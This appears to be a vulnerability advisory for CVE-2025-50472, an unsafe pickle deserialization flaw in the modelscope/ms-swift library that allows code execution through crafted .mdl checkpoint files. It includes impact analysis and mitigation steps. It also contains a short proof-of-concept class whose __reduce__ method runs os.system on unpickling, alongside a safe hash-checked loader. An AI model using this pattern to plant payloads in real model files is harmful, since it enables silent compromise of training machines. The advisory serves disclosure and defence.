CVE-2025-50472: n/a

Critical
Published: Fri Aug 01 2025 (08/01/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

The modelscope/ms-swift library up to and including version 2.6.1 is vulnerable to arbitrary code execution through deserialization of untrusted data within the `load_model_meta()` function of the `ModelFileSystemCache()` class. Attackers can execute arbitrary code and commands by crafting a malicious serialized `.mdl` payload, exploiting the use of `pickle.load()` on data from potentially untrusted sources. This vulnerability allows for remote code execution (RCE) by deceiving victims into loading a seemingly harmless checkpoint during a normal training process, thereby enabling attackers to execute arbitrary code on the targeted machine. Note that the payload file is a hidden file, making it difficult for the victim to detect tampering. More importantly, after the `.mdl` file is loaded and executes arbitrary code during model training, the normal training process remains unaffected, meaning the user remains unaware of the arbitrary code execution.

AI-Powered Analysis

Last updated: 08/01/2025, 16:32:53 UTC

Technical Analysis

CVE-2025-50472 is a critical security vulnerability affecting the modelscope/ms-swift library up to version 2.6.1. The vulnerability arises from unsafe deserialization practices within the `load_model_meta()` function of the `ModelFileSystemCache()` class. Specifically, the library uses Python's `pickle.load()` function to deserialize `.mdl` files, which are model checkpoint files used during machine learning model training. Because `pickle` can execute arbitrary code during deserialization, an attacker who crafts a malicious `.mdl` payload can achieve remote code execution (RCE) on the victim's system. The attack vector involves deceiving the victim into loading a seemingly benign checkpoint file during a normal training process. The malicious payload is hidden as a file with a `.mdl` extension and is designed to execute arbitrary commands without disrupting the normal training workflow, making detection difficult. This stealthy execution means the victim remains unaware that their system has been compromised. The vulnerability does not require user interaction beyond loading the malicious checkpoint, and no authentication is needed if the attacker can deliver the payload to the victim's environment. Although no known exploits are reported in the wild yet, the nature of the vulnerability and the widespread use of the modelscope/ms-swift library in machine learning workflows make this a significant threat. The lack of a patch or mitigation guidance at the time of publication further elevates the risk.
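The root cause described above is a general property of Python's `pickle`: any object whose class defines `__reduce__` can name an arbitrary callable that runs at `pickle.load()` time. The sketch below illustrates that mechanism in isolation; the class name and marker file are hypothetical and are not taken from ms-swift's code, but a crafted `.mdl` file exploits the same behavior inside `load_model_meta()`.

```python
import os
import pickle
import tempfile

# Marker file the payload will create, proving code ran (illustrative path).
marker = os.path.join(tempfile.gettempdir(), "mdl_poc_marker")
if os.path.exists(marker):
    os.remove(marker)

class MaliciousModelMeta:
    """Stand-in for a crafted .mdl payload (hypothetical class)."""
    def __reduce__(self):
        # The pickle stream stores a reference to os.system plus its
        # argument; unpickling calls it before the caller sees any data.
        return (os.system, (f"touch {marker}",))

payload = pickle.dumps(MaliciousModelMeta())

# What any code path equivalent to load_model_meta() effectively does:
pickle.loads(payload)          # the shell command runs here, silently
assert os.path.exists(marker)  # the payload executed during deserialization
```

Because the callable reference (`os.system`) travels inside the pickle stream itself, the victim does not need the attacker's class installed, and the surrounding training loop continues normally afterward.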

Potential Impact

For European organizations, this vulnerability poses a substantial risk, especially for entities involved in AI research, data science, and machine learning development. The ability to execute arbitrary code remotely can lead to full system compromise, data exfiltration, lateral movement within networks, and persistent backdoors. Confidentiality is at high risk as attackers can access sensitive training data, proprietary models, and intellectual property. Integrity is compromised because attackers can alter model training processes or inject malicious code into AI pipelines, potentially causing erroneous outputs or sabotaged AI models. Availability may also be affected if attackers deploy ransomware or disrupt critical AI services. Given the stealthy nature of the attack, detection and incident response become challenging, increasing the window of exposure. European organizations in sectors such as finance, healthcare, automotive, and government, which increasingly rely on AI models, are particularly vulnerable. The threat also extends to cloud environments and research institutions where modelscope/ms-swift is used. The absence of a CVSS score and patches means organizations must proactively assess and mitigate the risk to avoid potential exploitation.

Mitigation Recommendations

1. Immediately audit all usage of the modelscope/ms-swift library in AI/ML workflows and identify any instances of loading `.mdl` checkpoint files from untrusted or external sources.
2. Implement strict validation and integrity checks on all model checkpoint files before loading, such as cryptographic signatures or hashes, to ensure authenticity and integrity.
3. Avoid using `pickle` or any unsafe deserialization methods on untrusted data; consider replacing or wrapping the `load_model_meta()` function to use safer serialization formats like JSON or protobuf with strict schema validation.
4. Restrict file system permissions and access controls to prevent unauthorized users from placing or modifying `.mdl` files in model directories.
5. Monitor and log all model loading activities and anomalous file access patterns to detect potential exploitation attempts.
6. Isolate AI/ML training environments from critical production systems to limit the blast radius of a successful attack.
7. Stay updated with the modelscope/ms-swift project for any forthcoming patches or security advisories and apply them promptly.
8. Educate data scientists and ML engineers about the risks of loading untrusted model checkpoints and enforce secure development practices.
9. Employ endpoint detection and response (EDR) tools capable of detecting suspicious process behaviors indicative of code execution from deserialization.
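Recommendations 2 and 3 can be combined into a single safe-loading wrapper: verify the file's hash against a trusted manifest, then parse it with a format that cannot execute code. The sketch below is illustrative only; `load_model_meta_safe()` and the manifest layout are hypothetical and not part of ms-swift's API.

```python
import hashlib
import json

def sha256_of(path: str) -> str:
    """Compute the SHA-256 digest of a file, streaming in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def load_model_meta_safe(path: str, trusted_hashes: dict) -> dict:
    """Load checkpoint metadata only if its hash matches a trusted
    manifest, and parse it as JSON, which cannot execute code."""
    if trusted_hashes.get(path) != sha256_of(path):
        raise ValueError(f"untrusted or tampered checkpoint: {path}")
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)
```

A tampered file fails the hash check before any parsing occurs, and even a manifest mix-up cannot lead to code execution because JSON deserialization builds only plain data structures.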


Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2025-06-16T00:00:00.000Z
Cvss Version
null
State
PUBLISHED

Threat ID: 688ce8a8ad5a09ad00ca4603

Added to database: 8/1/2025, 4:17:44 PM

Last enriched: 8/1/2025, 4:32:53 PM

Last updated: 8/26/2025, 2:02:55 AM

Views: 25
